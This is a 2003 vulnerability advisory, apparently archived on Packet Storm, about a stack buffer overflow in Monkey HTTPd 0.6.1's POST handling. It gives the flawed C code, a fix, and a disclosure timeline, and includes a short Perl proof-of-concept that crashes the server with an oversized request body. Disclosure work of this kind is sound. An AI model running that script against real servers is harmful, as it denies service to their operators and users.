what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

monkeyHTTPd.txt

monkeyHTTPd.txt
Posted Apr 21, 2003
Authored by Matthew Murphy

The Monkey HTTPd v0.6.1 web server is vulnerable to a remote buffer overflow in the handling of forms submitted with the POST request method. The unchecked buffer lies in the PostMethod() procedure.

tags | exploit, remote, web, overflow
SHA-256 | 0301f75e2783269edb2b7a6fa9c640c16ea311a21771c827602cb320b112c4d0

monkeyHTTPd.txt

Change Mirror Download
Monkey HTTP Daemon Remote Buffer Overflow

ABSTRACT

"Monkey is a Web server written in C that works under Linux. This is an open
source project based on the HTTP/1.1 protocol. The objective is to develop
a fast, efficient, small and easy to configure web server."

(quote from https://monkeyd.sourceforge.net)

DESCRIPTION

A buffer overflow vulnerability exists in Monkey's handling of forms
submitted with the POST request method. The unchecked buffer lies in the
PostMethod() procedure. The buffer allocated on line 3 of PostMethod():

char buffer[MAX_REQUEST_BODY];

Is of size MAX_REQUEST_BODY, which is defined as follows in monkey.h:

#define MAX_REQUEST_BODY 10240 /* Maximo buffer del request */

The security check on line 10 of the procedure:

if(content_length_post<=0){

is flawed. This results in a buffer overflow inside the loop below:

memset(buffer,'\0',sizeof(buffer));
for(i=4;i<strlen(post_buffer);i++){
buffer[i-4]=post_buffer[i]; // Buffer overflow
}

ANALYSIS

Because the buffer that is overrun is a local buffer, it will be on the
stack of most architectures. If the system stores the return address on the
stack, the potential for flow control exists. In such a case, successful
exploitation yields the privileges of the monkey binary. An unsuccessful
exploit attempt would cause the server to fail, denying service to other
users.

DETECTION

This vulnerability was discovered in Monkey HTTPd v0.6.1.

#!/usr/bin/perl
# monkey-nuke.pl
# Monkey HTTPd Remote Buffer Overflow
# Discovery/Exploit by Matthew Murphy
use IO::Socket;
print STDOUT "What host to connect to \[\]\: ";
$host = trim(chomp($line = <STDIN>));
print STDOUT "What port to connect to \[80\]\: ";
$port = trim(chomp($line = <STDIN>));
$addr = "$host\:$port";
print STDOUT "What script to submit to \[\/cgi-bin\/test\.pl\]\: ";
$script = trim(chomp($line = <STDIN>));
$buffer = "A"x11000;
$exploit = "POST /$script HTTP/1.0\r\n";
$exploit.= "Content-Type: application/x-www-form-urlencoded\r\n";
$exploit.= "Content-Length: 11000\r\n\r\n";
$exploit.= "$buffer\r\n\r\n";
$f = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$addr);
print $f $exploit;
sleep 5;
undef $f;

WORKAROUND

In monkey.c, replace the line:

if(content_length_post<=0){

with:

if(content_length_post<=0 || content_length_post >= MAX_REQUEST_BODY){

Stop the server, re-build your binary, and restart the server.

VENDOR RESPONSE

The vendor was contacted on March 15, a fix was made public 9 days later on
March 24. The fixed version, Monkey 0.6.2 is available at:

Package
TAR/GZ
https://monkeyd.sourceforge.net/get_monkey.php?ver=4

Debian packages (un-officially maintained by Mattias Fernandez) have not
been updated as of time of writing.

DISCLOSURE TIMELINE

March 15, 2003: Initial developer notification
March 18, 2003: Response from Eduardo Silva (edsiper@yahoo.es) indicates
that vulnerability will be fixed by March 24
March 23, 2003: Final contacts with developer
March 24, 2003: Monkey HTTPd 0.6.2 released
April 20, 2003: Public disclosure

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    17 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close